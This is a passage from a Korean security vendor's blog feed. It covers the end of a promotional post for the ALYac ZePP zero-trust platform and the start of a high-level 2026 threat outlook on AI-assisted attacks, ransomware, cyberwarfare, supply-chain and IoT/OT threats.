&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1.&amp;nbsp;제로트러스트&amp;nbsp;표준&amp;nbsp;준수&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;NIST SP 800-207 Zero Trust Architecture를 기반으로, 사용자&amp;middot;기기&amp;middot;네트워크를 지속적으로 검증하는 구조를 제공합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2.&amp;nbsp;동적&amp;nbsp;접근&amp;nbsp;제어&amp;nbsp;및&amp;nbsp;네트워크&amp;nbsp;보호&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;SDP(Software Defined Perimeter) 기반 접근 제어를 통해 비인가 접근을 차단하고, 기존 네트워크 변경 없이 내부 횡적 이동을 효과적으로 통제합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3.&amp;nbsp;엔드포인트&amp;nbsp;인증&amp;nbsp;및&amp;nbsp;보안&amp;nbsp;상태&amp;nbsp;연계&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자 인증과 엔드포인트 보안 상태를 연계해, 보안 수준에 따라 접근 권한을 조정합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4.&amp;nbsp;통합&amp;nbsp;보안&amp;nbsp;정책&amp;nbsp;관리&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;엔드포인트, 접근 제어, 인증 정보를 하나의 콘솔에서 관리해 보안 운영 효율성과 가시성을 높입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;5. 신뢰 점수 기반 보안 운영&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자&amp;middot;기기&amp;middot;애플리케이션의 보안 상태를 정량화해 신뢰 점수로 산출하고, 이를 기반으로 보안 정책을 적용합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;알약 ZePP 도입 효과&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 ZePP은 제로트러스트 아키텍처 기반으로 보안 리스크를 줄이고, 보안 운영 효율성을 함께 고려한 플랫폼입니다. 네트워크 변경 없이 적용 가능한 구조로 도입 부담을 낮추는 동시에, 엔드포인트 중심의 통합 보안 체계를 통해 보안 정책의 일관성과 운영 안정성을 확보할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;제로트러스트는 이미 현실에서 검증되고 있습니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이스트시큐리티는 제로트러스트 보안 원칙을 스마트빌딩 환경에도 적용해 실제 운영 환경에서의 실증을 진행하고 있습니다. 해당 실증은 산업통상자원부와 한국에너지기술평가원이 주관하는 국책과제 &amp;lsquo;자율운전 기반 지능형 건물 에너지환경 통합관리시스템(iBEEMS)&amp;rsquo;의 일환으로, 스마트빌딩 내 센서&amp;middot;제어 시스템&amp;middot;IoT 장비의 이상 행위를 분석하고 비인가 접근을 탐지하는 보안 기술 검증을 목표로 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격 시나리오 기반 분석과 이상 행위 탐지를 통해, 제로트러스트의 핵심 원칙인 &amp;lsquo;지속적 검증&amp;rsquo;과 &amp;lsquo;행위 기반 판단&amp;rsquo;이 실제 환경에서도 효과적으로 적용될 수 있음을 확인하고 있으며, 전국 5개 실증 현장에서 연동 테스트가 진행 중입니다. 이는 제로트러스트가 IT 환경을 넘어 OT&amp;middot;IoT 영역까지 확장될 수 있음을 보여주는 사례입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;새로운 보안 운영 체계로의 전환, 알약 ZePP&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사이버 위협이 고도화되는 환경에서 기존 경계 중심 보안만으로는 충분한 대응이 어렵습니다. 제로트러스트는 기업 보안 운영 방식을 근본적으로 전환하는 전략이며, 알약 ZePP은 이를 현실적인 구조로 구현한 제로트러스트 통합 보안 플랫폼입니다. 이스트시큐리티는 알약 ZePP을 통해 기업이 변화하는 위협 환경에 보다 안정적으로 대응할 수 있는 보안 체계를 구축할 수 있도록 지원합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;트워크 접근부터 사용자 인증, 엔드포인트 보안 상태까지 하나의 흐름으로 연결해 관리함으로써, 기업은 보다 명확한 보안 기준과 일관된 정책으로 보안 운영을 이어갈 수 있습니다. 또한 기존 인프라 변경 부담 없이 단계적으로 적용할 수 있어, 제로트러스트 도입을 고민하는 기업에게 현실적인 선택지가 될 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;우리 조직의 환경에서는 제로트러스트를 어떻게 적용할 수 있을지&lt;span&gt;, &lt;/span&gt;&lt;span&gt;알약 ZePP으로 어떤 영역부터 보안 체계를 재정비할 수 있을지&lt;/span&gt;가 궁금하다면, 이스트시큐리티 전문가와의 상담을 통해 확인해 보시기 바랍니다. 기업 환경에 맞춘 도입 방향과 적용 범위를 함께 검토해 드립니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (2).png&quot; data-origin-width=&quot;647&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c7r32u/dJMcafLXdLu/nL00O6VSABLpO6h6l3TaS1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc7r32u%2FdJMcafLXdLu%2FnL00O6VSABLpO6h6l3TaS1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;115&quot; data-filename=&quot;Group 485151 (2).png&quot; data-origin-width=&quot;647&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>iBEEMS</category>
      <category>기업보안</category>
      <category>스마트빌딩</category>
      <category>알약ZePP</category>
      <category>엔드포인트보안</category>
      <category>이스트시큐리티</category>
      <category>제로트러스트</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5691</guid>
      <comments>https://alyacofficialblog.tistory.com/5691#entry5691comment</comments>
      <pubDate>Mon, 22 Dec 2025 11:20:29 +0900</pubDate>
    </item>
    <item>
      <title>2025년 보안 위협 회고 및 2026년 보안 위협 전망</title>
      <link>https://alyacofficialblog.tistory.com/5690</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;안녕하세요&amp;nbsp; &lt;br /&gt;이스트시큐리티&amp;nbsp;시큐리티대응센터(ESRC)&amp;nbsp;입니다.&amp;nbsp; &lt;br /&gt;&amp;nbsp; &lt;br /&gt;이스트시큐리티는 2025년에 발생했던 보안 위협들을 정리해보고, 2026년 보안 위협들을 전망해 보았습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2026년 보안 위협 전망&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;2026_보안위협전망.png&quot; data-origin-width=&quot;600&quot; data-origin-height=&quot;920&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/lHrso/dJMcagjMS0o/KlaaGb0T4oKFB2jKwuVqC0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/lHrso/dJMcagjMS0o/KlaaGb0T4oKFB2jKwuVqC0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/lHrso/dJMcagjMS0o/KlaaGb0T4oKFB2jKwuVqC0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FlHrso%2FdJMcagjMS0o%2FKlaaGb0T4oKFB2jKwuVqC0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;488&quot; height=&quot;748&quot; data-filename=&quot;2026_보안위협전망.png&quot; data-origin-width=&quot;600&quot; data-origin-height=&quot;920&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1)&amp;nbsp;AI,&amp;nbsp;전&amp;nbsp;공격&amp;nbsp;단계에서&amp;nbsp;핵심&amp;nbsp;자원으로&amp;nbsp;활용&amp;nbsp;&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;2026년&amp;nbsp;이후에는&amp;nbsp;AI가&amp;nbsp;사이버&amp;nbsp;공격의&amp;nbsp;모든&amp;nbsp;단계에&amp;nbsp;전면적으로&amp;nbsp;활용되며,&amp;nbsp;공격&amp;nbsp;체인의&amp;nbsp;자동화와&amp;nbsp;지능화가&amp;nbsp;본격화될&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;정찰,취약점&amp;nbsp;분석,침투,측면&amp;nbsp;이동,데이터&amp;nbsp;탈취&amp;nbsp;및&amp;nbsp;협상에&amp;nbsp;이르기까지&amp;nbsp;공격&amp;nbsp;전&amp;nbsp;과정을&amp;nbsp;AI가&amp;nbsp;보조하는&amp;nbsp;형태로&amp;nbsp;확장될&amp;nbsp;가능성이&amp;nbsp;높습니다.&amp;nbsp;특히&amp;nbsp;공격자들은&amp;nbsp;인터넷&amp;nbsp;노출&amp;nbsp;자산을&amp;nbsp;자동으로&amp;nbsp;파악하고,&amp;nbsp;서비스별&amp;nbsp;취약점을&amp;nbsp;AI가&amp;nbsp;실시간으로&amp;nbsp;분석하며,&amp;nbsp;환경에&amp;nbsp;맞춰&amp;nbsp;악성&amp;nbsp;페이로드를&amp;nbsp;즉시&amp;nbsp;생성&amp;nbsp;및&amp;nbsp;변형하는&amp;nbsp;AI&amp;nbsp;공격&amp;nbsp;파이프라인도&amp;nbsp;구축할&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;특히&amp;nbsp;AI&amp;nbsp;기술의&amp;nbsp;발전은&amp;nbsp;고도화된&amp;nbsp;공격을&amp;nbsp;수행하기&amp;nbsp;위한&amp;nbsp;기술적&amp;nbsp;장벽을&amp;nbsp;크게&amp;nbsp;낮추어,&amp;nbsp;과거에는&amp;nbsp;전문&amp;nbsp;APT&amp;nbsp;그룹만&amp;nbsp;가능했던&amp;nbsp;정교한&amp;nbsp;공격을&amp;nbsp;일반&amp;nbsp;공격자도&amp;nbsp;수행할&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;환경이&amp;nbsp;만들어&amp;nbsp;지며&amp;nbsp;전&amp;nbsp;공격&amp;nbsp;단계에서&amp;nbsp;AI가&amp;nbsp;핵심&amp;nbsp;자원으로&amp;nbsp;활용될&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&amp;nbsp;&lt;br /&gt;&lt;b&gt;2)&amp;nbsp;APT&amp;nbsp;조직들의&amp;nbsp;랜섬웨어&amp;nbsp;활용&amp;nbsp;보편화&amp;nbsp;&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;2026년에는&amp;nbsp;국가&amp;nbsp;연계&amp;nbsp;APT&amp;nbsp;조직의&amp;nbsp;공격&amp;nbsp;체계에서&amp;nbsp;정찰,&amp;nbsp;정보&amp;nbsp;수집&amp;nbsp;중심&amp;nbsp;공격과&amp;nbsp;데이터&amp;nbsp;암호화&amp;middot;갈취를&amp;nbsp;결합한&amp;nbsp;&amp;lsquo;혼합형&amp;nbsp;위협&amp;nbsp;모델&amp;rsquo;이&amp;nbsp;더욱&amp;nbsp;확대될&amp;nbsp;것으로&amp;nbsp;전망됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;랜섬웨어는&amp;nbsp;단순한&amp;nbsp;금전&amp;nbsp;수익&amp;nbsp;창출을&amp;nbsp;넘어,&amp;nbsp;핵심&amp;nbsp;산업&amp;nbsp;부문의&amp;nbsp;운영을&amp;nbsp;중단시키거나&amp;nbsp;사회적&amp;nbsp;혼란을&amp;nbsp;유발하는&amp;nbsp;정치,&amp;nbsp;전략적&amp;nbsp;압박&amp;nbsp;수단으로&amp;nbsp;활용되고,&amp;nbsp;APT공격은&amp;nbsp;정찰&amp;nbsp;및&amp;nbsp;정보수집이&amp;nbsp;목적이고,&amp;nbsp;랜섬웨어는&amp;nbsp;금전적&amp;nbsp;이득을&amp;nbsp;목적으로&amp;nbsp;한&amp;nbsp;범죄조직이라는&amp;nbsp;기존의&amp;nbsp;개념의&amp;nbsp;의미는&amp;nbsp;퇴색되고&amp;nbsp;국가&amp;nbsp;차원의&amp;nbsp;위협과&amp;nbsp;범죄&amp;nbsp;기반&amp;nbsp;공격&amp;nbsp;생태계가&amp;nbsp;융합되는&amp;nbsp;형태로&amp;nbsp;진화할&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;3)&amp;nbsp;국가&amp;nbsp;간&amp;nbsp;갈등심화에&amp;nbsp;따른&amp;nbsp;사이버전&amp;nbsp;격화&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;2026년에는&amp;nbsp;이미&amp;nbsp;진행&amp;nbsp;중인&amp;nbsp;전쟁에서&amp;nbsp;검증된&amp;nbsp;사이버&amp;nbsp;공격&amp;nbsp;전술들이&amp;nbsp;다른&amp;nbsp;갈등&amp;nbsp;지역으로&amp;nbsp;확산되면서,&amp;nbsp;국가&amp;nbsp;간&amp;nbsp;사이버전의&amp;nbsp;양상이&amp;nbsp;더욱&amp;nbsp;전략적이고&amp;nbsp;파괴적인&amp;nbsp;형태로&amp;nbsp;고도화될&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;와이퍼&amp;nbsp;악성코드,&amp;nbsp;위성통신&amp;nbsp;교란,&amp;nbsp;핵심&amp;nbsp;인프라&amp;nbsp;파괴,&amp;nbsp;정보전&amp;nbsp;등은&amp;nbsp;실제&amp;nbsp;전장에서&amp;nbsp;효과가&amp;nbsp;확인된&amp;nbsp;공격&amp;nbsp;모델들로,&amp;nbsp;2026년&amp;nbsp;이후&amp;nbsp;고조되는&amp;nbsp;국가&amp;nbsp;간&amp;nbsp;긴장&amp;nbsp;상황에서도&amp;nbsp;정치&amp;middot;군사적&amp;nbsp;목적&amp;nbsp;달성을&amp;nbsp;위한&amp;nbsp;전면적&amp;nbsp;사이버전&amp;nbsp;전술로&amp;nbsp;재사용되거나&amp;nbsp;더&amp;nbsp;정교해진&amp;nbsp;버전이&amp;nbsp;등장할&amp;nbsp;가능성이&amp;nbsp;큽니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;현재&amp;nbsp;진행되고&amp;nbsp;있는&amp;nbsp;여러&amp;nbsp;국가들의&amp;nbsp;갈등&amp;nbsp;상황이&amp;nbsp;무력&amp;nbsp;전쟁으로&amp;nbsp;확대될&amp;nbsp;경우,&amp;nbsp;금융,&amp;nbsp;통신,&amp;nbsp;에너지&amp;nbsp;등&amp;nbsp;국가&amp;nbsp;기능&amp;nbsp;전반을&amp;nbsp;마비시키려는&amp;nbsp;전략적&amp;nbsp;사이버&amp;nbsp;공격도&amp;nbsp;본격화될&amp;nbsp;것이며,&amp;nbsp;강화된&amp;nbsp;형태의&amp;nbsp;파괴형&amp;nbsp;악성코드,&amp;nbsp;대규모&amp;nbsp;정보조작,&amp;nbsp;심리전,&amp;nbsp;사회&amp;nbsp;혼란&amp;nbsp;유발형&amp;nbsp;공격이&amp;nbsp;동시에&amp;nbsp;동원될&amp;nbsp;가능성이&amp;nbsp;높습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;또한&amp;nbsp;국가&amp;nbsp;지원&amp;nbsp;해커&amp;nbsp;그룹을&amp;nbsp;지원하거나&amp;nbsp;다양한&amp;nbsp;국가&amp;nbsp;지원&amp;nbsp;해커&amp;nbsp;그룹을&amp;nbsp;양성하는&amp;nbsp;등&amp;nbsp;국가차원에서&amp;nbsp;사이버&amp;nbsp;공격을&amp;nbsp;더욱&amp;nbsp;적극적으로&amp;nbsp;전개할&amp;nbsp;가능성도&amp;nbsp;있을&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;4)&amp;nbsp;오픈소스&amp;nbsp;생태계를&amp;nbsp;겨냥한&amp;nbsp;공급망&amp;nbsp;공격의&amp;nbsp;심화&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;오픈소스&amp;nbsp;생태계의&amp;nbsp;의존도가&amp;nbsp;증가하면서,&amp;nbsp;공격자들은&amp;nbsp;오픈소스를&amp;nbsp;공급망&amp;nbsp;공격의&amp;nbsp;취약&amp;nbsp;지점으로&amp;nbsp;활용하려는&amp;nbsp;시도가&amp;nbsp;증가할&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;특히&amp;nbsp;패키지&amp;nbsp;레지스트리&amp;nbsp;자체에&amp;nbsp;대한&amp;nbsp;공격&amp;nbsp;시도가&amp;nbsp;확대되며,&amp;nbsp;단일&amp;nbsp;패키지의&amp;nbsp;공격이&amp;nbsp;수만&amp;nbsp;개의&amp;nbsp;프로젝트로&amp;nbsp;전파되는&amp;nbsp;대규모&amp;nbsp;피해가&amp;nbsp;반복될&amp;nbsp;가능성이&amp;nbsp;높으며,&amp;nbsp;단순&amp;nbsp;패키지&amp;nbsp;공격&amp;nbsp;수준을&amp;nbsp;넘어&amp;nbsp;오픈소스&amp;nbsp;레지스트리,&amp;nbsp;프로젝트&amp;nbsp;유지관리자,&amp;nbsp;AI&amp;nbsp;개발&amp;nbsp;도구까지&amp;nbsp;하나의&amp;nbsp;확장된&amp;nbsp;공격&amp;nbsp;표면으로&amp;nbsp;통합되는&amp;nbsp;단계로&amp;nbsp;진화할&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;5)&amp;nbsp;IOT/OT를&amp;nbsp;노린&amp;nbsp;국가&amp;nbsp;차원의&amp;nbsp;물리,&amp;nbsp;사이버&amp;nbsp;복합&amp;nbsp;공격&amp;nbsp;증가&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;2026년에는&amp;nbsp;국가&amp;nbsp;간&amp;nbsp;갈등이&amp;nbsp;심화되는&amp;nbsp;가운데,&amp;nbsp;전면적&amp;nbsp;사이버전과는&amp;nbsp;별개로&amp;nbsp;산업&amp;nbsp;인프라&amp;nbsp;자체를&amp;nbsp;직접&amp;nbsp;교란하는&amp;nbsp;전술적&amp;nbsp;하이브리드&amp;nbsp;공격이&amp;nbsp;증가할&amp;nbsp;것으로&amp;nbsp;예상됩니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;스마트&amp;nbsp;시티&amp;nbsp;인프라,&amp;nbsp;에너지&amp;nbsp;설비,&amp;nbsp;교통&amp;nbsp;체계&amp;nbsp;등&amp;nbsp;IoT/OT&amp;nbsp;기반&amp;nbsp;산업&amp;nbsp;제어&amp;nbsp;시스템이&amp;nbsp;국가&amp;nbsp;경쟁력의&amp;nbsp;핵심&amp;nbsp;자산으로&amp;nbsp;부각되면서,&amp;nbsp;공격&amp;nbsp;표면은&amp;nbsp;더&amp;nbsp;넓어지고&amp;nbsp;있습니다.&amp;nbsp;특히,&amp;nbsp;대부분의&amp;nbsp;OT&amp;nbsp;환경은&amp;nbsp;실시간&amp;nbsp;운영&amp;nbsp;요구사항과&amp;nbsp;오래된&amp;nbsp;레거시&amp;nbsp;시스템의&amp;nbsp;특성&amp;nbsp;때문에&amp;nbsp;보안&amp;nbsp;패치&amp;nbsp;및&amp;nbsp;업데이트가&amp;nbsp;어려워&amp;nbsp;근본적인&amp;nbsp;방어에&amp;nbsp;취약점을&amp;nbsp;안고&amp;nbsp;있습니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;공격자들은&amp;nbsp;이러한&amp;nbsp;IoT/OT의&amp;nbsp;특징을&amp;nbsp;노려,&amp;nbsp;취약한&amp;nbsp;IoT&amp;nbsp;단말을&amp;nbsp;침투&amp;nbsp;지점으로&amp;nbsp;활용하고,&amp;nbsp;OT/ICS&amp;nbsp;영역까지&amp;nbsp;침투하는&amp;nbsp;단계적&amp;nbsp;공격&amp;nbsp;방식을&amp;nbsp;시도할&amp;nbsp;것으로&amp;nbsp;예상되며,&amp;nbsp;이러한&amp;nbsp;흐름은&amp;nbsp;국가&amp;nbsp;인프라의&amp;nbsp;실질적&amp;nbsp;운영&amp;nbsp;중단,&amp;nbsp;장비&amp;nbsp;손상,&amp;nbsp;물리적&amp;nbsp;사고&amp;nbsp;유발까지&amp;nbsp;이어질&amp;nbsp;수&amp;nbsp;있어&amp;nbsp;사이버전과는&amp;nbsp;다른&amp;nbsp;차원의&amp;nbsp;산업&amp;nbsp;기반&amp;nbsp;위협으로&amp;nbsp;자리&amp;nbsp;잡을&amp;nbsp;것으로&amp;nbsp;전망됩니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2025년 보안 위협 회고&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;600&quot; data-origin-height=&quot;920&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cWs35d/dJMcagRCWT5/Ab9yijcqcWCxf7vDhvfROK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cWs35d/dJMcagRCWT5/Ab9yijcqcWCxf7vDhvfROK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cWs35d/dJMcagRCWT5/Ab9yijcqcWCxf7vDhvfROK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcWs35d%2FdJMcagRCWT5%2FAb9yijcqcWCxf7vDhvfROK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;530&quot; height=&quot;813&quot; data-origin-width=&quot;600&quot; data-origin-height=&quot;920&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
